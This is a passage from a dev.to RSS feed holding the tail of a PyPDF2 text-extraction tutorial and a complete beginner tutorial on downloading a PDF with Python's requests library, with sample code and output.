
&lt;p&gt;This is the directory structure after executing &lt;code&gt;script.py&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Python Project/
├── app/
│   ├── script.py
│   ├── the_raven.pdf
│   ├── the_raven.txt
│
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;After reading this article you should now be able to extract text from a PDF using Python's &lt;code&gt;PyPDF2&lt;/code&gt; library. Remember, if you extract text and you encounter unrecognizable text make sure you are using the correct string encoding.  If you found this article helpful, please &lt;code&gt;like&lt;/code&gt;, &lt;code&gt;follow&lt;/code&gt;, and &lt;code&gt;leave a comment&lt;/code&gt;!&lt;/p&gt;

&lt;h3&gt;
  
  
  🔗 Resource Links
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/seraph776/DevCommunity/tree/main/PDFTextExtract"&gt;GitHub Source Code&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>python</category>
      <category>tutorial</category>
      <category>programming</category>
      <category>productivity</category>
    </item>
    <item>
      <title>Download PDF Files Using Python</title>
      <dc:creator>Seraph★776</dc:creator>
      <pubDate>Fri, 15 Jul 2022 23:33:00 +0000</pubDate>
      <link>https://dev.to/seraph776/download-pdf-files-using-python-4064</link>
      <guid>https://dev.to/seraph776/download-pdf-files-using-python-4064</guid>
      <description>&lt;p&gt;This article discusses how to download a PDF using Python's &lt;code&gt;requests&lt;/code&gt; library.&lt;/p&gt;

&lt;h2&gt;
  
  
  Approach
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Import &lt;code&gt;requests&lt;/code&gt;library&lt;/li&gt;
&lt;li&gt;Request the URL and get the &lt;code&gt;response&lt;/code&gt; object.&lt;/li&gt;
&lt;li&gt;Get the PDF file using the &lt;code&gt;response&lt;/code&gt; object, and return &lt;code&gt;True&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;If the PDF cannot be downloaded, return &lt;code&gt;False&lt;/code&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Implementation
&lt;/h2&gt;

&lt;p&gt;The following program downloads a PDF files from the provided URL.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;#!/usr/bin/env python3
&lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;os&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;requests&lt;/span&gt;


&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;download_pdf_file&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="s"&gt;"""Download PDF from given URL to local directory.

    :param url: The url of the PDF file to be downloaded
    :return: True if PDF file was successfully downloaded, otherwise False.
    """&lt;/span&gt;

    &lt;span class="c1"&gt;# Request URL and get response object
&lt;/span&gt;    &lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;requests&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;stream&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="bp"&gt;True&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# isolate PDF filename from URL
&lt;/span&gt;    &lt;span class="n"&gt;pdf_file_name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;basename&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;status_code&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;200&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="c1"&gt;# Save in current working directory
&lt;/span&gt;        &lt;span class="n"&gt;filepath&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;getcwd&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt; &lt;span class="n"&gt;pdf_file_name&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nb"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;filepath&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;'wb'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;pdf_object&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="n"&gt;pdf_object&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;content&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="s"&gt;'&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;pdf_file_name&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; was successfully saved!'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;
    &lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="s"&gt;'Uh oh! Could not download &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;pdf_file_name&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;,'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="s"&gt;'HTTP response status code: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;status_code&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;


&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s"&gt;'__main__'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="c1"&gt;# URL from which pdfs to be downloaded
&lt;/span&gt;    &lt;span class="n"&gt;URL&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;'https://raw.githubusercontent.com/seraph776/DevCommunity/main/PDFDownloader/assests/the_raven.pdf'&lt;/span&gt;
    &lt;span class="n"&gt;download_pdf_file&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;URL&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Output
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;the_raven.pdf was successfully saved!
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;After reading this article you should now be able to download a PDF using Python's &lt;code&gt;requests&lt;/code&gt;library.  Remember that some website might more difficult than others to get data from. If you are unable to download the PDF file, analyze the &lt;a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Status"&gt;HTTP response status codes&lt;/a&gt; to help determine what wrong. Please leave a comment if you found this article helpful.&lt;/p&gt;




&lt;p&gt;Code available at &lt;a href="https://github.com/seraph776/DevCommunity/tree/main/PDFDownloader"&gt;GitHub&lt;/a&gt;&lt;/p&gt;

</description>
      <category>python</category>
      <category>tutorial</category>
      <category>programming</category>
      <category>productivity</category>
    </item>
  </channel>
</rss>
